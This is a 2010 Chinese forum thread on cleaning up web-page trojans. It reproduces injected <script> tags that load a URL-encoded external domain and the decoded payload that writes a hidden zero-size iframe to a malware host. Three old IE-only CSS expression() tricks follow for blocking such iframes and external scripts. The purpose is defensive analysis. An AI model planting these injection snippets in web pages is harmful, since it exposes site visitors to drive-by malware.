服务器技术/网络安全

网页木马解决的技巧

楼主 秀网小婷于 2010-09-02 11:52:56

网页木马解决的技巧

[SIZE=2]现在挂网马的方式真地改变了，现在流行挂<script>[FACE=宋体]木马，看了几个网友的网站都被这样了——页面的顶部或底部加上了：[/SIZE] [/FACE][P][SIZE=2][FACE=宋体]注意，以下地址含有木马，请不要轻易访问：[/SIZE] [/FACE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script>[/SIZE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script> [/SIZE][/P][P][SIZE=2][/SIZE][/P][P][SIZE=2][FACE=宋体]一连插入了[/SIZE]N[FACE=宋体]个一样的[/FACE]<script>[FACE=宋体]标记。偶的电脑什么补丁都打了，直接访问这个[/FACE]http://%76%63%63%64%2E%63%6E[FACE=宋体]（或直接使用迅雷下载），现形了：[/FACE] [/FACE][/P][P][SIZE=2]document.write("<div style='display:none'>")[/SIZE][/P][P][SIZE=2]document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")[/SIZE][/P][P][SIZE=2]document.write("</div>") [/SIZE][/P][P][SIZE=2][/SIZE][/P][P][SIZE=2][FACE=宋体]又用迅雷下载[/SIZE]http://a.158dm.com/b1.htm[FACE=宋体]这个文件，一看，乱七八糟的[/FACE]JS[FACE=宋体]编码，汗，不过找到了一个类似[/FACE]QQ[FACE=宋体]号的数字，直接加加看，然后是专业提供网马的组织！[/FACE] [/FACE][/P][P][SIZE=2]...[/SIZE][/P][P][SIZE=2]var Kfqq, Qqs="784378237"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;[/SIZE][/P][P][SIZE=2](...[FACE=宋体]略[/SIZE])[FACE=宋体]（下面还有[/FACE]N[FACE=宋体]个统计的[/FACE]JS[FACE=宋体]代码）[/FACE] [FACE=宋体]网页教学网[/FACE] [/FACE][/P][P][SIZE=2][FACE=宋体] 大家来看看，[/SIZE]<script>[FACE=宋体]木马的特点是什么：[/FACE] [/FACE][/P][P][SIZE=2]<script src=http://%76%63%63%64%2E%63%6E></script> [/SIZE][/P][P][SIZE=2][/SIZE][/P][P][SIZE=2][FACE=宋体]对了，[/SIZE]script[FACE=宋体]木马的[/FACE]src[FACE=宋体]一般都是外域的，也就是[/FACE]src[FACE=宋体]是以[/FACE]http[FACE=宋体]打头的，如果是自己网站的[/FACE]script[FACE=宋体]一般都不用加上[/FACE]http[FACE=宋体]；再看看木马的原形，里面还是输出的[/FACE]iframe[FACE=宋体]、[/FACE]JS[FACE=宋体]代码或是其他[/FACE]<object>[FACE=宋体]代码，不管这么多，来多少杀多少。[/FACE] [/FACE][/P][P][SIZE=2][/SIZE][/P][P][SIZE=2][FACE=宋体]来跟我写[/SIZE]CSS[FACE=宋体]，一一搞定它们[/FACE],[FACE=宋体]有[/FACE]5[FACE=宋体]种不同的方案，大家来测试一下哈：[/FACE] [/FACE][/P][P][SIZE=2][FACE=宋体]解决方案１：[/SIZE] [/FACE][/P][P][SIZE=2][/SIZE][/P][P][SIZE=2]iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*[FACE=宋体]这行代码是解决挂[/SIZE]IFRAME[FACE=宋体]木马的哦[/FACE]*/[/FACE][/P][P][SIZE=3][SIZE=2]script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('[/SIZE][FACE=宋体][SIZE=2]木马被成功隔离[/FACE][SIZE=2]!'):'');}[/SIZE] [/SIZE][/SIZE][/P]

1楼 秀网小婷于 2010-09-02 11:55:41

[P]本文来自：[URL=http://www.idcer.cn]www.idcer.cn[/URL][/P][P] 继续分享：[/P][P] [/P][P][SIZE=2][FACE=宋体]解决方案２：[/FACE] [/SIZE][/P][SIZE=3][P][SIZE=2]iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}[/SIZE][/P][P][SIZE=3][SIZE=2]script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}[/SIZE] [/SIZE][/P][P][SIZE=2][FACE=宋体]原理：将外域的[/FACE]JS[FACE=宋体]文件的[/FACE]document.write()[FACE=宋体]使用[/FACE]document.close()[FACE=宋体]强制关闭。木马内容还没有来得及写完，只有部分被强制缓存输出了，剩下的不会再写了[/FACE][/SIZE][/P][/SIZE]

2楼 秀网小婷于 2010-09-02 11:56:18

[TABLE=transparent,0,0,100%,left,transparent,0,none][TR][TD][P][SIZE=14px][P][P]本文来自：[URL=http://www.idcer.cn/][COLOR=#1b7ac9]www.idcer.cn[/COLOR][/URL][/P][P] 继续分享：[/P][P][SIZE=3][FACE=宋体]解决方案３：[/FACE][/SIZE][/P][P][SIZE=3][/SIZE] [/P][P][SIZE=2]iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}[/SIZE][/P][P][SIZE=2]script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} [/SIZE][/P][P][SIZE=2][/SIZE] [/P][P][SIZE=3][SIZE=2][FACE=宋体]原理：同到外域的[/FACE]JS[FACE=宋体]文件，立即调用[/FACE]IE[FACE=宋体]私有的[/FACE]execCommand[FACE=宋体]方法来停止页面所有请求，所以接下来的外域[/FACE]JS[FACE=宋体]文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是[/FACE]JS[FACE=宋体]模拟[/FACE]IE[FACE=宋体]停止按钮的一种方法。[/FACE][/SIZE] [/SIZE][/P][/SIZE][/P][/P][/TD][/TR][/TABLE]

电脑版 Page created in 0.0938 seconds with 4 queries.